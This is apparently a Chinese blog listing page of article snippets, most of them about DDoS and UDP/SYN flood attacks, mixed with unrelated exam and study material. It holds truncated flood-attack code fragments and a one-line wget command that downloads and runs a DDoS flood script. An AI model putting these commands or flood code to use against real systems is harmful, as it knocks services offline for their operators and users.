08-22 2万+
UDP报文结构 UDP_Flood攻击原理 UDP Flood是日渐猖厥的流量型DoS攻击,原理也很简单。常见的情况是利用大量UDP小包冲击DNS服务器或Radius认证服务器、流媒体视频服务器。 100k pps的UDP Flood经常将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪。由于UDP协议是一种无连接的服务,在UDP FLOOD攻击中,攻击者可发送大量伪造源IP地址的小...
CISSP-OSG-要点总结梳理
小虫先生的博客
10-19 2465
CISSP-OSG-各章节要点总结梳理
DDOS代码
oldnetbug的专栏
03-08 457
//在工程属性中设置“允许不安全代码”为true using System; using System.Net; using System.Net.Sockets; using System.Threading; //需要的命名空间不用解释了吧 namespace syn { public struct ipHeader { public
为什么 DDoS 攻击偏爱使用 TCP 和 UDP 包?
最新发布
@云安全小杜
08-01 1077
Distributed Denial of Service (DDoS) 攻击是指攻击者利用多个计算机系统或网络设备(通常是被恶意软件感染的计算机,被称为“僵尸网络”)来淹没目标服务器的资源,导致合法用户无法访问服务。TCP 和 UDP 是两种最常见的用于 DDoS 攻击的网络协议。
一个简单的ddos访问攻击代码
weixin_50289058的博客
02-16 466
作者声明:仅用于学习。
Python Ddos攻击代码
Reaper ghost的博客
10-05 1914
这是一个用Python编写的简单的DDoS攻击源码。该代码通过创建一个UDP套接字并发送大量随机数据包到指定的IP地址和端口号来实现DDoS攻击攻击大小可以通过更改"bytes"变量中的数字来调整。不过我建议大家不要拿去做坏事哈!如果大家不知道你要测压的网站的ip是什么,可以像这样1.打开命令提示符然后你会看到如下的状态2.输入ping 网址我这里ping的是搜狗浏览器的ip,你们的自己修改。注意!要去掉"https://"或"http://",后面不能留有"/"3.按下回车键,你就会看到如下状态。
DDOS攻击
qq_39891520的博客
03-05 185
example follow: public class DDos { public static void main(String[] args) { ExecutorService es = Executors.newFixedThreadPool(1000); Mythread mythread = new
信息安全-期末复习题
热门推荐
李桥桉的博客
01-04 1万+
信息安全概论 一、选择题: 1.Smtp协议使用的端口号是(D )。 A、20 B、21 C、23 D、25 2.下面那个命令可以显示本机的路由信息。( ) A、Ping B、Ipconfig C、Tracert D、Netstat 3.计算机病毒是指:( C )。 A、带细菌的磁盘   B、 已损坏的磁盘  C、 具有破坏性的特制程序    D、被破坏了的程序 4.197
Java 全栈知识体系( PDF 可下载)
m0_67698950的博客
03-17 5394
40000 +字长文总结,民工哥已将此文整理成PDF文档了,需要的见文后下载获取方式。 全栈知识体系总览 Java入门与进阶 面向对象与Java基础 Java 基础 - 面向对象 Java 基础 - 知识点 Java 基础 - 图谱 & Q/A 基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制: Java 基础 - 泛型机制详解 Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本
H12-223
setfacl的博客
06-09 2026
考试项目:HCIP-Routing & Switching-IEEP V2.0 考试项目代码: H12-223 1.项目交付完成后,仍然会持续产生运行维护费用,请问以下哪些项目属于运维期间产生的费 用?(多选) A.设备折旧费用 B.线路建设费用 C.线路租用费用 D.能源费用 E.人员费用 参考答案:CDE 2. 项目范围可以从三个方面进行界定,其中不包括 A.覆盖范围 B.功能边界 C.投资额度 D.工程边界 参考答案:C 3. 客户的项目组作为网络的最终使用者,对网络项目做出最终评价。 A.T
基于流量分析DDoS检测方法
DDoS(Distributed Denial of Service)攻击是一种通过同时使用多个计算机或设备来对目标系统发起攻击的网络安全威胁。这种攻击使用大量的流量或请求来超过目标系统的处理能力,导致目标系统无法正常响应合法用户的...
Python-UDP-Flood:使用 python 进行的非常基本的 DOS 攻击
05-29
Python-UDP-洪水 使用 python 进行的非常基本的 DOS 攻击。 可以使用多台计算机将其转换为DDOS攻击。 我不对您使用此程序提供的使用负责。 它支持UDP和TCP 用法 下载或复制rundos.sh的脚本 也许你应该这样做才能让它发挥作用。 chmod +x rundos.sh 自动安装脚本 wget -O ddos.sh ' https://raw.githubusercontent.com/XaviFortes/Python-UDP-Flood/master/rundos.sh ' && chmod +x ddos.sh && ./ddos.sh 运行此代码并想再次打开它后,只需执行以下操作: ./ddos.sh 如果你想要一个自动更新的 bash 脚本(我认为它不会更新太多),把自动安装脚本放在一个 .sh 文件中 视窗 如果你在 Windows
udp flood攻击【C源代码
12-23
http://download.csdn.net/detail/wuchunlai_2012/9372564 这个udpFlood是从上面我写的那个synflood里改的,很简单,如果大家需要做两个攻击的话建议自己改一个就ok,也可以集成在一起。还能多练习,熟悉tcp和udp的区别
编译原理udp flood 攻击实验报告
06-20
编译原理udp flood 攻击实验报告
如何用java 写简单的网络ddos攻击(黑客),从入门到精通系列网络安全工程师路线介绍_java 防 ddos
韩束一叶子
04-30 1329
作为一名即将求职的程序员,2024年你的就业机会和风口会出现在哪里?在这种新环境下,工作应该选择大厂还是小公司?已有几年工作经验的老兵,又应该如何保持和提升自身竞争力,转被动为主动?根据腾讯安全发布的《互联网安全报告》,目前中国网络安全人才供应严重匮乏,每年高校安全专业培养人才仅有3万余人,而网络安全岗位缺口已达70万,缺口高达95%。而且,我们到招聘网站上,搜索【网络安全】【Web安全工程师】【渗透测试】等职位名称,可以看到安全岗位薪酬待遇好,随着工龄和薪酬增长,呈现「越老越吃香」的情况。
DDOS攻击UDP可以屏蔽么?又或者UDP可以屏蔽 那流量放大攻击呢?
a38417的博客
02-10 4103
为什么要封海外: 总所周知,目前国内的大攻击大多都来自海外,因为国外的攻击成本比国内会低很多,一旦发起了攻击,并不容易找到攻击的源头。国外的家用带宽能达到千M口,咱们国内的百M口,相当于一只外国肉鸡能顶我们国内好几台肉鸡,那这个量是不得了的,而且国内的网站几乎很少有国外用户访问,目前封海外是国内的一大趋势。 UDP攻击是什么: UDP攻击全称:UDP淹没攻击UDP Flood Attack)。UDP淹没攻击是导致主机拒绝服务的一种攻击,属于带宽类攻击UDP是一种无连接的协议,不需要用任何程序.
UDP反射DDoS攻击原理和防范
weixin_30398227的博客
06-05 787
东南大学:UDP反射DDoS攻击原理和防范 2015-04-17 中国教育网络 李刚 丁伟   反射攻击的防范措施   上述协议安装后由于有关服务默认处于开启状态,是其被利用的一个重要因素。因此,防范可以从配置主机服务选项和访问控制权限(ACL)入手。具体建议如下:   Chargen攻击防范配置方法   关闭Chargen服务,具体的操作方法:   1.Linux系统:...
python网络渗透之:DOS攻击_ddos攻击脚本,2024年最新网络安全知识体系
2401_84182636的博客
04-10 1712
以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 3366
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
Arbor Networks的Anti-DDoS解决方案概览
这一系列工具能够帮助运营商在边缘和接入层进行Scrubbing(流量清洗),保护网络不受DDoS攻击的影响。 在地理分布上,Arbor的客户遍布美洲、欧洲、中东和非洲(EMEA)以及亚太地区(AsiaPac),显示了其全球影响力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值